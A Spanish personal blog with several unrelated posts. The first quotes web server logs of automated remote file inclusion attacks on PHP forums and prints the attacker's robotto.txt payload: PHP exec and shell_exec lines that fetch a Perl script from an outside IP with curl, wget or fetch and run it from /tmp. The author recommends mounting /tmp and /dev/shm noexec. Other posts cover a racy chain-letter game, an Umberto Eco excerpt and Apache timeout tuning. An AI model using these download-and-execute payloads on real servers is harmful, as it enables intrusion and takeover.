El Cuchitril

Una imagén vale mas que mil palabras, un video, un poquito mas…

A ultimas fechas me he encontrado con que los defacers y/o script kiddies ya tienen unos scripts (valga la rebusnancia), automatizados en perl

[code=’Bash’]
dominioatacado.com:75.126.134.16 – – [10/Jul/2007:01:34:30 -0500] «GET /guruforo/index.php/modules/Forums/admin/admin_styles.php?phpb
b_root_path=http://floydz.imess.net/cmd.txt? HTTP/1.1» 200 56485 «-» «libwww-perl/5.805»
dominioatacado.com:75.126.134.16 – – [10/Jul/2007:10:07:56 -0500] «GET /guruforo/index.php/MOD_forum_fields_parse.php?phpbb_root_path
=http://floydz.imess.net/cmd.txt? HTTP/1.1» 200 56480 «-» «libwww-perl/5.805»
dominioatacado.com:64.92.199.49 – – [10/Jul/2007:09:18:29 -0500] «GET / HTTP/1.0» 200 8571 «-» «libwww-perl/5.805»
dominioatacado.com:64.92.199.37 – – [10/Jul/2007:09:24:19 -0500] «GET / HTTP/1.0» 200 8571 «-» «libwww-perl/5.805»
legiondominioatacado.com:81.34.160.119 – – [10/Jul/2007:05:49:59 -0500] «GET /perlyell.gif HTTP/1.0» 200 750 «http://www.legion
dominioatacado.com/index3.html» «Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)»
legiondominioatacado.com:201.159.1.60 – – [10/Jul/2007:17:58:35 -0500] «GET /perlyell.gif HTTP/1.1» 200 750 «http://www.legiona
dominioatacado.com/index3.html» «Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)»
dominioatacado.com:80.247.202.176 – – [10/Jul/2007:05:16:30 -0500] «GET /portal/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_co
ntent&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.eclypse.info/img/ec.gif? HTTP/1.1» 200 28 «-» «libwww
-perl/5.803»
dominioatacado.com:80.247.202.176 – – [10/Jul/2007:05:16:34 -0500] «GET /portal/index.php?_REQUEST=&_REQUEST%5boption%5d=com_con
tent&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.eclypse.info/img/ec.gif? HTTP/1.1» 200 28 «-» «libwww-
perl/5.803»
dominioatacado.com:208.53.170.15 – – [10/Jul/2007:02:55:33 -0500] «GET /portal2//index2.php?showpage=http://85.114.143.143/dai
sy/robotto.txt?? HTTP/1.1» 200 604 «-» «libwww-perl/5.805»
dominioatacado.com:208.53.170.15 – – [10/Jul/2007:03:01:23 -0500] «GET /portal2//index2.php?showpage=http://85.114.143.143/dai
sy/robotto.txt?? HTTP/1.1» 200 604 «-» «libwww-perl/5.805»
dominioatacado.com:65.98.55.194 – – [10/Jul/2007:03:01:24 -0500] «GET /portal2//index2.php?showpage=http://85.114.143.143/dais
y/robotto.txt?? HTTP/1.1» 200 604 «-» «libwww-perl/5.805»
[/code]

Todo con libwww-perl :D

Y pues de ahi ya llaman a shells, backdoors, bots y otras cochinadas, sin embargo me parecio un tanto interesante el que ahora automaticen y que hasta parezca que tiene un batch de diferentes pruebas para diferentes scripts (de hecho solo postee lo que dio 202, tengo un monton de 404, pero haria crecer este post)

http://85.114.143.143/daisy/robotto.txt
[code=’PHP’]
echo exec(‘cd /tmp;curl http://85.114.143.143/daisy/unix.txt -o b;perl b;rm b;’);
echo exec(‘cd /tmp;GET http://85.114.143.143/daisy/unix.txt>b;perl b;rm b;’);
echo exec(‘cd /tmp;wget http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;’);
echo exec(‘cd /tmp;fetch http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;’);
echo passthru(‘cd /tmp;fetch http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;’);
echo passthru(‘cd /tmp;wget http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;’);
echo passthru(‘cd /tmp;curl http://85.114.143.143/daisy/unix.txt -o b;perl b;rm b;’);
echo passthru(‘cd /tmp;GET http://85.114.143.143/daisy/unix.txt>b;perl b;rm b;’);
echo system(‘cd /tmp;curl http://85.114.143.143/daisy/unix.txt -o b;perl b;rm b;’);
echo system(‘cd /tmp;GET http://85.114.143.143/daisy/unix.txt>b;perl b;rm b;’);
echo system(‘cd /tmp;wget http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;’);
echo system(‘cd /tmp;fetch http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;’);
echo shell_exec(‘cd /tmp;curl http://85.114.143.143/daisy/unix.txt -o b;perl b;rm b;’);
echo shell_exec(‘cd /tmp;GET http://85.114.143.143/daisy/unix.txt>b;perl b;rm b;’);
echo shell_exec(‘cd /tmp;wget http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;’);
echo shell_exec(‘cd /tmp;fetch http://85.114.143.143/daisy/unix.txt;mv unix.txt b;perl b;rm b;’);
[/code]

Claro que mucho de esto nomas con tener /tmp con noexec y nosuid pues ha dejado fuera estos scripts, sin embargo muchos seguro no han contado con que a ultimas fechas tambien se puede usar /dev/shm para intentar usar esto (asi que no es mala idea en el fstab tener /tmp y /dev/shm como noexec y nosuid)

En todo caso me pregunto por que mod_security no ha llegado a Etch. :/

INSTRUCCIONES // REGLAS

* Cada jugador comienza con un listado de 8 cosas sobre sí mismo (no cuenta nada que venga en par en el cuerpo).
* Tiene que escribir en su blog esas 8 cosas, junto con las reglas del juego.
* Debe seleccionar a 8 personas más para invitar a jugar y escribir sus nombres.
* Por último, tiene que dejar un mensaje en sus blogs invitándoles a jugar, indicando en el mensaje, el post de su propio blog

Esto es bastante divertido de hacer. Sólo lean la ‘ofensa’ y si la han cometido, deben pagar esa multa. Sigan haciendo la cuenta hasta que hayan leído todas y cada una de las ‘ofensas’ y sumen el total de las multas.

Cuando hayan terminado, envíen un correo informando la cantidad total que deben pagar, a quien les envía este correo, y a sus amigos.

Titulen el correo: ‘mi multa fue de $___________________________’

*’No hay que confesar qué faltas se cometieron, sólo el total de la multa!*

Ofensas:

Fumar marihuana — $10,000
Viaje de ácido — $5,000
Haber tenido sexo en una iglesia–$25,000
Despertar en la mañana y no saber el nombre de la persona que está al lado $40,000
Haber tenido sexo en el cyber espacio — $25,000
Haber tenido sexo por dinero — $100,000
Haber hecho daños en lugares públicos — $20,000
Haber tenido sexo en la cama de papá y mamá — $10,000
Haber golpeado a alguien — $20,000
Haberse vestido como alguien del sexo opuesto — $10,000
Haberle dado dinero a un(a) desnudista — $25,000
Haberse enamorado del (la) desnudista — $20,000
Haberse rumbeado a algún(a) desconocido(a) — $5,000
Haberle ‘echado los perros’ a alguien del mismo sexo en la oficina –$15,000
Haber manejado borracho — $20,000
Haberse emborrachado en la oficina, o haber llegado borracho(a) a la oficina — $50,000
Haber usado ‘ayudas’ o juguetes durante el sexo — $30,000
Haberse caido de la borrachera y no recordar lo sucedido la noche anterior — $20,000
Haber nadado desnudo — $5,000
Haber tenido sexo en una piscina — $20,000
Haber besado a alguien del mismo sexo $10,000
Haber tenido sexo con alguien del mismo sexo — $20,000
Haberle ‘puesto los cuernos’ a su pareja — $10,000
Habérselos puesto con un(a) amigo(a) o un(a) pariente — $20,000
Haber tenido sexo oral — $5,000
Haber recibido sexo oral — $5,000
Haberlo hecho/recibido en un carro en marcha — $25,000
Haberse robado algo — $10,000
Haber hecho un video XXX casero — $15,000
Haber hecho un trío — $50,000
Haber tenido sexo al aire libre — $20,000
Haber estado en el mismo cuarto mientras otros tenían sexo –$25,000
Haberse robado algo valioso– $20,000
Haber tenido sexo con alguien 10 años mayor que uno — $20,000
Haber tenido sexo con alguien de 21 o menos si uno tiene 27 o mas –$25,000
Haberse enamorado de dos o más personas a la vez — $50,000
Haberle dicho a alguien que lo(a) amabas sin que fuera cierto — $25,000
Haberse paseado desnudo(a) — $5,000
Haberse paseado desnudo(a) en plena luz del día — $15,000
Haber sido arrestado — $5,000
Haberse hecho pipí en la piscina — $1,000
Haber jugado Botella, la verdad o se atreve — $5,000
Haber hecho algo de lo que se arrepienta — $20,000
Haber tenido sexo con su mejor amigo(a)–$20,000
Haber tenido sexo con alguien en el trabajo — $25,000
Haber tenido sexo anal –$80,000
Haberle mentido a tu pareja — $5,000
Haberle mentido a tu pareja sobre lo bueno que fue el sexo que acababan de tener — $25,000

A sumar! No olviden postear su resultado con: ‘ Mi multa fue
de$…’ 356,000.00

Y los nominados son:
Quienes se gusten apuntar :D

«It’s queer how out of touch with truth women are. They live in a world of their own, and there has never been anything like it, and never can be. It is too beautiful altogether, and if they were to set it up it would go to pieces before the first sunset.»

Joseph Conrad…

Muy buena lectura, sin embargo prefiero la entrada a las tinieblas, desde la visión de Coppola en «Apocalypse Now Redux».

Ayer descubrí que blografia.net esta bloqueado por los apliances «Websense» y lawaloca, NO. Con lo cual no se como sentirme, si halagado, por que la compañia de filtrado tuvo a bien catalogar mi sitio o enojado de saber que en muchas oficinas no se puede leer el mismo :P, pero si puedes leer de futbol y ver mujeres con escasa y nula ropa.

Tambien me encontre con un par de conectores electricos «usables unicamente en caso de emergencia» (ambos con tierra fisica), que bien, para empezar esta canijo que un conector en una oficina sea solo «usable en caso de emergencia», No me imagino en cual y mucho menos quiero estar presente cuando se presente esa emergencia… mas aún por que para obtener corriente electrica de ellos se requiere pedirlo por oficio (en una emergencia me encantaria saber si quien requiere el oficio, va a estar disponible).

C’est la vie!

21 de Julio, mantengan su RSS Reader sintonizado

Hubo un tiempo en que la universidad era una
universidad de élite. Sólo iban a ella los hijos de los titu-
lados. Salvo raras excepciones, los que estudiaban dispo-
nían de todo el tiempo que necesitaran. La universidad
estaba concebida para dedicarse a ella con calma: cierto
tiempo para el estudio y cierto tiempo para las «sanas»
diversiones goliárdicas o para las actividades en los orga-
nismos representativos.

Las clases eran conferencias prestigiosas, y a conti-
nuación los estudiantes más interesados se apartaban con
los profesores y los ayudantes en seminarios separados de
diez o quince personas como máximo.

Aun hoy en muchas universidades norteamericanas
un curso jamás tiene más de diez o veinte estudiantes
(que pagan muy caro y tienen derecho a «usar» al ense-
ñante todo lo que quieran para discutir con él). En univer-
sidades como Oxford hay un profesor, llamado tutor, que
se ocupa de las tesis de investigación de un grupo reduci-
dísimo de estudiantes (puede suceder que se cuide de uno
o dos al año) y sigue día a día su trabajo.

Si tal fuese la situación italiana, no habría necesidad
de escribir este libro; si bien algunos de los consejos que
da podrían convenir también al estudiante «ideal» antes
esbozado.

Pero la universidad italiana es hoy día una universidad
de masas. Llegan a ella estudiantes de todas clases, prove-
nientes de todos los tipos de enseñanza media y que inclu-
so se matriculan en filosofía o en filología clásica provi-
niendo de un instituto técnico en que jamás han cursado
griego, e incluso ni siquiera latín. Y si bien es cierto que
de poco sirve el latín para muchos tipos de actividad,
sirve de mucho a quienes estudian filosofía y letras.
Hay cursos en que están matriculadas millares de per-
sonas. El profesor conoce más o menos a una treintena
que asisten con más frecuencia, y con ayuda de sus cola-
boradores (becarios, adjuntos, auxiliares) consigue hacer
trabajar con cierta asiduidad a un centenar. Muchos de
ellos son pudientes, criados en una familia culta y en con-
tacto con un ambiente cultural vivaz, que pueden permi-
tirse viajes instructivos, asisten a los festivales artísticos
y teatrales y visitan países extranjeros. Luego vienen los
otros. Estudiantes que a lo mejor trabajan y se pasan el
día en la oficina de censo de una población de diez mil
habitantes donde sólo hay papelerías. Estudiantes que,
desilusionados de la universidad, han elegido la actividad
política y persiguen otro tipo de formación, pero que an-
tes o después tendrán que cumplir el compromiso de la
tesis. Estudiantes muy pobres que, teniendo que escoger
un examen, calculan el precio de los diversos textos pres-
critos y se dicen: «este examen es de tantas pesetas», y de
dos complementarios eligen el que cuesta menos. Estu-
diantes que en ocasiones acuden a clase y luchan por en-
contrar un sitio en el aula atiborrada; y al final les gusta-
ría hablar con el docente, pero hay una cola de treinta
personas y han de tomar el tren porque no pueden que-
darse en un hotel. Estudiantes a quienes nadie ha explica-
do jamás cómo se busca un libro en una biblioteca y en
qué biblioteca: frecuentemente no saben que podrían en-
contrar libros en la biblioteca de su ciudad o ignoran
cómo se saca una tarjeta de préstamo.

Los consejos de este libro están especialmente destina-
dos a ellos. También valen para el estudiante de enseñan-
za superior que va a ir a la universidad y quisiera saber
cómo funciona la alquimia de la tesis.
….
Así pues, este libro está destinado a quien (sin ser mi-
llonario ni disponer de diez años para doctorarse tras
haber viajado por todo el mundo), con posibilidades acep-
tables de dedicar unas cuantas horas diarias al estudio,
quiere preparar una tesis que le proporcione ciertas satis-
facciones intelectuales y que le sirva también después del
doctorado. Y a quien, una vez fijados los límites, por mo-
destos que sean, de su esfuerzo, quiera hacer un trabajo
serio.»

Eco, Humberto.
Còmo se hace una tesis. CIRCA 1982

PS. Hice mucho mayor la cita, puesto que Eco, en especial me parece excelente para este tema y no como critico de la universad de masas.

Y no precisamente sobre un pie… hace algun tiempo escribi sobre una máquina que nos estaba dando dolores de cabeza ya que la carga de la misma se iba al cielo.

Usando siege intente ver escenarios hipotéticos donde sysfence entrara en acción para evitar que el sistema se muriera.

Lo primero que note según las gráficas del munin es que el uso de memoria se había disparado al cielo, también la carga. Así que mis primeras reglas fueron sobre la memoria y después sobre la carga… lo que hacían a manera de resumen era que si la carga llegaba a un nivel muy alto, detenían el servicio que suponíamos estaba causando problemas durante digamos 1 minuto, para darle tiempo al cpu de recuperarse de toda la actividad de I/O…

En las pruebas con siege la cosa parecía funcionar bien, pero claro usar siege es «simular» una actividad que uno espera, es decir, para nada se puede comparar con la actividad real que se va a presentar… en todo caso contento con estas reglas, deje listo todo listo.

¿Resultado? La máquina se cayo un domingo al mediodía y puesto que el lunes era festivo, hasta el martes se le dio botonazo.

¿Y entonces?, ¿cambiar la maquina a un sistema mas grande? pues eso seria lo optimo, problema principal… el sistema es custom made, y requiere de compilar algunos módulos específicos… que al menos yo no conozco a fondo.

Pero pensándolo de otra forma, aun cuando el problema se encontraba en las búsquedas en la base de datos, finalmente a esta se accedía mediante apache, el cual podía lanzar diferentes búsquedas complejas, así que pensándolo de nuevo, pudiera ser que la solución fuera recibir menos conexiones concurrentes y bajar en mucho el timeout de las peticiones, es decir si una búsqueda es demasiado compleja, se va a llevar mucho tiempo, ¿por qué no acabar con ella si excede de determinado tiempo? pues bien asi le hice y pues en la configuración de apache modifique los time outs asi como la cantidad máxima de conexiones concurrentes.

[code=’Bash’]
#
# Timeout: The number of seconds before receives and sends time out.
#
# default 300
Timeout 150

#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100

#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 15
#
# Limit on total number of servers running, i.e., limit on the number
# of clients who can simultaneously connect — if this limit is ever
# reached, clients will be LOCKED OUT, so it should NOT BE SET TOO LOW.
# It is intended mainly as a brake to keep a runaway server from taking
# the system with it as it spirals down…
#
# Default 150
MaxClients 70
#Default 100
#
MaxRequestsPerChild 50

[/code]

Bueno todo este borlote en el httpd.conf ayudó a pasar de